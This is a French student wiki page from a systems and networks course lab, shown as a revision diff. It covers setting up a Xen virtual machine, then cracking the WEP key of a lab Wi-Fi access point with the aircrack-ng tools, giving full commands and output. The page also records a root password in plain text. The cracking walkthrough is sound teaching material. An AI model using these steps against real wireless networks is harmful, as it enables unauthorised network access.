TP sysres IMA2a5 2020/2021 G7 : Différence entre versions

De Wiki d'activités IMA
(Configuration de la VM)
Ligne 108 : Ligne 108 :
  
 
Les VM ont un état -b, ce qui valide le fait qu’elles fonctionnent toutes. Au delà des IMA2A5, on voit aussi celles des IMA5sc.
 
Les VM ont un état -b, ce qui valide le fait qu’elles fonctionnent toutes. Au delà des IMA2A5, on voit aussi celles des IMA5sc.
 +
 +
=== Cassage de clef WEP d’un point d’accès WiFi ===
 +
 +
On branche d’abord une clef wifi et je commence à installer le paquetage aircrack-ng.
 +
 +
Je dois trouver le point d’accès : canal et nom des réseaux.
 +
 +
Via airmon-ng, un script permettant d’activer ou de désactiver le mode moniteur d’une carte réseau.
 +
 +
Dans notre cas, la carte Wi-fi se place en observateur du réseau.
 +
 +
Je liste les interfaces disponibles :
 +
  root@zabeth09:~# airmon-ng
 +
    PHY   Interface   Driver Chipset
 +
    phy0  wlx40a5efd2140c rt2800usb Ralink Technology, Corp. RT5370
 +
 +
Puis, je passe la carte Wifi wlx40a5efd2140c en mode moniteur, espion du réseau sans fil.
 +
 +
  root@zabeth09:~# airmon-ng start wlx40a5efd2140c
 +
  Interface wlx40a5efd2140cmon is too long for linux so it will be renamed to the old style (wlan#) name.
 +
        (mac80211 monitor mode vif enabled on [phy0]wlan0mon
 +
        (mac80211 station mode vif disabled for [phy0]wlx40a5efd2140c)
 +
 +
Le nom de l'interface a été modifié, considéré trop long et wlan0mon a été choisi.
 +
 +
En relançant airmon-ng, on peut voir que le nom de l’interface a bien été changé
 +
  root@zabeth09:~# airmon-ng
 +
    PHY   Interface Driver Chipset
 +
    phy0    wlan0mon rt2800usb Ralink Technology, Corp. RT5370
 +
 +
Je scanne le réseau Wifi, j’obtiens toutes les trames Wifi sur tous les canaux
 +
  root@zabeth09:~# airmon-ng –encrypt wep wlan0mon
 +
 +
Beaucoup d'informations s'affichent et je visualise cracotte07 dans la liste pour ses informations.
 +
 +
  root@zabeth09:~# airodump-ng --channel 9 --bssid 04:DA:D2:9C:50:56 wlan0mon
 +
Tous les cracotte se trouvent sur channel 9 et le SSID de cracotte07 est 04:DA:D2:9C:50:56
 +
 +
Je récupère toutes les données qui transitent sur ce channel en me concentrant uniquement sur les paquets échangés avec cracotte07.
 +
 +
  airodump-ng -w lcrack -c 9 --bssid 04:DA:D2:9C:50:56 wlan0mon
 +
 +
Je lance un autre terminal pour décrypter la clé WEP
 +
  root@zabeth09:~# aircrack-ng lcrack-01.cap
 +
  Opening lcrack-01.capse wait…
 +
 +
Il faut attendre plusieurs minutes et on obtient la clé, on peut voir qu’il en a testé 833 avant.
 +
 +
                              Aircrack-ng 1.5.2
 +
                [00:00:00] Tested 833 keys (got 73079 IVs)
 +
  KB    depth  byte(vote)
 +
    0    0/ 17  F1(93696) BD(84480) E7(84224) 6F(83456) 12(82176)
 +
    1    0/  1  91(103680) 34(83968) 54(83456) B3(83456) B9(82432)
 +
    2    2/  2  60(83200) 3A(82688) 7E(82176) 12(81920) 0E(81664)
 +
    3  15/  3  B1(79872) 06(79616) 11(79616) 5B(79360) B2(79104)
 +
    4    0/  1  74(103168) 8D(85248) 03(82176) 7A(82176) 21(81664)
 +
            KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:09:99:99:99 ]
 +
Decrypted correctly: 100%

Version du 4 novembre 2020 à 23:19

Installation de la machine virtuelle Xen

Création de la VM

Je commence par créer la VM sur le serveur commun capbreton, je me connecte alors en ssh

 ssh root@capbreton.plil.info 

Nom de ma machine : hawker

Adresse IP de la machine : 193.48.57.171

Adresse du routeur : 193.48.57.163

Le répertoire des disques virtuels : /usr/local/xen

 xen-create-image --hostname=hawker --ip=193.48.57.171 --gateway=193.48.57.163 --dir=/usr/local/xen –dist=beowulf

J’ai aussi utilisé une seconde méthode qui fonctionne mieux en gardant le nom de ma machine hawker

Le miroir Debian est celui de l’école : http://fr.deb.devuan.org/merged/

La distribution stable courant : http://proxy.polytech-lille.fr:3128

 xen-create-image --hostname=hawker --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force

En lançant un second terminal, je peux suivre le processus d’installation

 tail -f /var/log/xen-tools/hawker.log

Lorsque l’installation est terminée, j'obtiens plusieurs informations dont le mot de passe du routeur.

    Installation Summary
    ---------------------
    Hostname        :  hawker
    Distribution    :  ascii
    MAC Address     :  00:16:3E:A4:65:07
    IP Address(es)  :  dynamic
    SSH Fingerprint :  SHA256:xxxxxxx (DSA)
    SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)
    SSH Fingerprint :  SHA256:xxxxxxx (ED25519)
    SSH Fingerprint :  SHA256:xxxxxxx (RSA)
    Root Password   :  xxxxxxxxxxxxxxxxxxxxxxxx

Via la commande passwd, j'ai changé le mot de passe par "glopglop"

Configuration de la VM

Pour commencer, je dois modifier le fichier de configuration de la VM pour donner accès au bridge réseau. Je récupère le nom du bridge "IMA2a5"

 brctl show 

J'accède au fichier de configuration de ma VM /etc/xen/hawker.cfg J'ajoute mon adresse MAC donnée précédemment et le bridge IMA2a5.

kernel      = '/boot/vmlinuz-4.9.0-6-amd64'
extra       = 'elevator=noop'
ramdisk     = '/boot/initrd.img-4.9.0-6-amd64'

vcpus       = '1'
memory      = '1024'

root        = '/dev/xvda2 ro'
disk        = [
                  'file:/usr/local/xen/domains/hawker/disk.img,xvda2,w',
                  'file:/usr/local/xen/domains/hawker/swap.img,xvda1,w',
              ]

name        = 'hawker'

vif         = [ 'mac=00:16:3E:A4:65:07, bridge=IMA2a5' ]

on_poweroff = 'destroy'
on_reboot   = 'restart'
on_crash    = 'restart'

J'accède à ma machine virtuelle

 xl create /etc/xen/hawker.cfg
 xl console hawker

Je crée deux partitions var et home qui seront reliés à ma MV

 lvcreate -L10G -n hawker-var virtual
 lvcreate -L10G -n hawker-home virtual

Je pointe le système de fichier sur les deux nouvelles partitions

 mke2fs /dev/virtual/hawker-home
 mke2fs /dev/virtual/hawker-var

Les disques sont finalisés, je les connecte à la VM en modifiant le fichier de configuration hawker.cfg pour qu'elles deviennent ses partitions.

disk        = [
                  'file:/usr/local/xen/domains/hawker/disk.img,xvda2,w',
                  'file:/usr/local/xen/domains/hawker/swap.img,xvda1,w',
                  'phy:/dev/virtual/hawker-home,xvdb1,w',
                  'phy:/dev/virtual/hawker-var,xvdb2,w',
              ]

Puis je redémarre la VM pour prendre en compte les modifications

 xl shutdown hawker
 xl create /etc/xen/hawker.cfg

Configuration pour forcer le montage à chaque démarrage

 /dev/xvdb1    /home ext4  defaults   0   2
 /dev/xvdb2    /var  ext4  defaults   0   2

J’assure la montée des 2 disques /home et /var

On peut vérifier que la VM est prête

 xl list

On peut voir que l’état du domaine est r, cela stipule qu’il fonctionne.

Les VM ont un état -b, ce qui valide le fait qu’elles fonctionnent toutes. Au delà des IMA2A5, on voit aussi celles des IMA5sc.

Cassage de clef WEP d’un point d’accès WiFi

On branche d’abord une clef wifi et je commence à installer le paquetage aircrack-ng.

Je dois trouver le point d’accès : canal et nom des réseaux.

Via airmon-ng, un script permettant d’activer ou de désactiver le mode moniteur d’une carte réseau.

Dans notre cas, la carte Wi-fi se place en observateur du réseau.

Je liste les interfaces disponibles :

 root@zabeth09:~# airmon-ng
   PHY	  Interface	  Driver	Chipset
   phy0  wlx40a5efd2140c rt2800usb	Ralink Technology, Corp. RT5370

Puis, je passe la carte Wifi wlx40a5efd2140c en mode moniteur, espion du réseau sans fil.

 root@zabeth09:~# airmon-ng start wlx40a5efd2140c
 Interface wlx40a5efd2140cmon is too long for linux so it will be renamed to the old style (wlan#) name.
       (mac80211 monitor mode vif enabled on [phy0]wlan0mon
       (mac80211 station mode vif disabled for [phy0]wlx40a5efd2140c)

Le nom de l'interface a été modifié, considéré trop long et wlan0mon a été choisi.

En relançant airmon-ng, on peut voir que le nom de l’interface a bien été changé

 root@zabeth09:~# airmon-ng
   PHY	  Interface	Driver		Chipset
   phy0    wlan0mon	rt2800usb	Ralink Technology, Corp. RT5370

Je scanne le réseau Wifi, j’obtiens toutes les trames Wifi sur tous les canaux

 root@zabeth09:~# airmon-ng –encrypt wep wlan0mon

Beaucoup d'informations s'affichent et je visualise cracotte07 dans la liste pour ses informations.

 root@zabeth09:~# airodump-ng --channel 9 --bssid 04:DA:D2:9C:50:56 wlan0mon

Tous les cracotte se trouvent sur channel 9 et le SSID de cracotte07 est 04:DA:D2:9C:50:56

Je récupère toutes les données qui transitent sur ce channel en me concentrant uniquement sur les paquets échangés avec cracotte07.

 airodump-ng -w lcrack -c 9 --bssid 04:DA:D2:9C:50:56 wlan0mon

Je lance un autre terminal pour décrypter la clé WEP

 root@zabeth09:~# aircrack-ng lcrack-01.cap
 Opening lcrack-01.capse wait…

Il faut attendre plusieurs minutes et on obtient la clé, on peut voir qu’il en a testé 833 avant.

                             Aircrack-ng 1.5.2 
                [00:00:00] Tested 833 keys (got 73079 IVs)
  KB    depth   byte(vote)
   0    0/ 17   F1(93696) BD(84480) E7(84224) 6F(83456) 12(82176) 
   1    0/  1   91(103680) 34(83968) 54(83456) B3(83456) B9(82432) 
   2    2/  2   60(83200) 3A(82688) 7E(82176) 12(81920) 0E(81664) 
   3   15/  3   B1(79872) 06(79616) 11(79616) 5B(79360) B2(79104) 
   4    0/  1   74(103168) 8D(85248) 03(82176) 7A(82176) 21(81664) 
            KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:09:99:99:99 ] 

Decrypted correctly: 100%